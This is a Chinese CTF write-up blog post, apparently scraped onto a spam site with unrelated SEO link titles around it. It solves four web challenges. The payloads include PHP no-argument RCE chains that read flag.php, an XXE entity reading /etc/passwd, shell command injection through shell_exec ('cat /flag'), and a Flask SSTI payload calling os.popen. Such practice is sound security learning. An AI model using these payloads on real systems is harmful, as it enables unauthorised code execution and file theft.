当前位置: 首页 > news >正文

网站编程所用的语言有免费网站优化排名

网站编程所用的语言有,免费网站优化排名,路由下做网站映射,贵阳城乡建设学校网站文章目录 前言题目[GXYCTF 2019]禁止套娃方法一方法二 [NCTF 2019]Fake XML cookbook[NSSRound#7 Team]ec_RCE[NCTF 2018]Flask PLUS 前言 今天是2023.9.3,大二开学前的最后一天。老实说ctf的功力还是不太够做的题目太少,新学期新气象。不可急于求成&am…

文章目录

  • 前言
  • 题目
    • [GXYCTF 2019]禁止套娃
      • 方法一
      • 方法二
    • [NCTF 2019]Fake XML cookbook
    • [NSSRound#7 Team]ec_RCE
    • [NCTF 2018]Flask PLUS


前言

今天是2023.9.3,大二开学前的最后一天。老实说ctf的功力还是不太够做的题目太少,新学期新气象。不可急于求成,稳扎稳打,把能利用的时间用来提升web实力。


题目

[GXYCTF 2019]禁止套娃

打开题目,直接扫一下目录
发现是存在git泄露—参考文章

在这里插入图片描述然后使用专门的工具Githack(下载地址)
打开终端,运行python(运行后要访问,/.git/才能有结果)

在这里插入图片描述源代码

<?php
include "flag.php";
echo "flag在哪里呢?<br>";
if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦!");}}else{die("再好好想想!");}}else{die("还想读flag,臭弟弟!");}
}
// highlight_file(__FILE__);
?>

分析一下
第一个if语句禁用了一些php伪协议
第二个if语句很明显是无参rce的标志,一般代码为

if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    eval($_GET['code']);
}

第三个if语句是禁用我们要rce的一些函数,比如phpinfo()

所以rce的关键是无参

方法一

使用session_start()+session_id()读取文件(php<7)

payload

?exp=show_source(session_id(session_start())); 
Cookie: PHPSESSID=flag.php

得到flag

在这里插入图片描述

方法二

php函数直接读取文件

先读取数组,查看flag在第几个
payload

?exp=print_r(scandir(current(localeconv())));

在这里插入图片描述
发现是第三个,那么我们可以先倒序再读取第二个

?exp=highlight_file(next(array_reverse(scandir(current(localeconv())))));

即可得到flag

[NCTF 2019]Fake XML cookbook

打开题目,根据提示应该不是sql注入
随便输入然后bp抓包,发现是xml格式的登录

在这里插入图片描述联想到XML中存在的XXE漏洞
payload

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [<!ENTITY admin SYSTEM "file:///etc/passwd">]>
<user><username>&admin;</username><password>1</password></user>

在这里插入图片描述修改下命令,直接得到flag

在这里插入图片描述

[NSSRound#7 Team]ec_RCE

源代码

 <!-- A EZ RCE IN REALWORLD _ FROM CHINA.TW -->
<!-- By 探姬 -->
<?PHPif(!isset($_POST["action"]) && !isset($_POST["data"]))show_source(__FILE__);putenv('LANG=zh_TW.utf8'); $action = $_POST["action"];$data = "'".$_POST["data"]."'";$output = shell_exec("/var/packages/Java8/target/j2sdk-image/bin/java -jar jar/NCHU.jar $action $data");echo $output;    
?> 

分析一下,有两个POST参数可控,然后出现shell_exec()函数
它的作用:将字符串作为OS命令执行,需要输出执行结果,且输出全部的内容。
payload

action=||&data='cat /flag'
或者
action=;cat /flag&data=

得到flag

[NCTF 2018]Flask PLUS

打开题目,在url输入{{7*7}}
在这里插入图片描述发现存在ssti漏洞

payload

{{lipsum.__globals__['o''s']['pop''en']('ls /').read()}}

在这里插入图片描述
然后得到flag
在这里插入图片描述

http://www.hengruixuexiao.com/news/21326.html

相关文章:

  • 网站排名乐云seoseo引擎优化培训
  • 微山县建设局官方网站网络市场的四大特点
  • wordpress延迟加载插件南昌网优化seo公司
  • 建设行业最新资讯动态网站seo网站推广方法
  • 网站怎么在移动端推广成都网站快速排名提升
  • 做熊猫tv网站的目的天津企业seo
  • 建站购物网站如何做市场推广方案
  • 湖南网站建设制作西安网站seo外包
  • 十大最佳摄影网站如何做网络宣传推广
  • 网站建设多少钱怎么卖百度大数据查询
  • 建设银行网站看不到e商十大经典案例
  • 河北建设工程信息网网seo排名优化点击软件有哪些
  • 可做区域代理的网站百度搜索风云排行榜
  • .net 网站开发书籍网店怎么开
  • 做暧小视频xo网站青岛百度seo代理
  • 餐饮网站设计公司网络营销有几种方式
  • 十分钟日本在线观看视频seo关键词选择及优化
  • sm做任务的网站有哪些怎么建立网站快捷方式
  • 没效果优化防疫措施+科学精准防控
  • 商城的网站建设安徽seo顾问服务
  • 北京网站策划服务房地产十大营销手段
  • 重庆企业网站推广59软文网
  • 公司建立网站费用公众号推广接单平台
  • wordpress评论可见插件徐州seo企业
  • 住房和城乡建设部贰级建造师网站营销软件哪个好
  • 什么蓝色 适合公司网站主色站长之家ip查询
  • 永久免费手机建站长春网站建设方案优化
  • c++语言做网站网络媒体有哪些
  • 建设网站容易吗长沙网络公司排名
  • 网站宣传的手段有哪些seo中国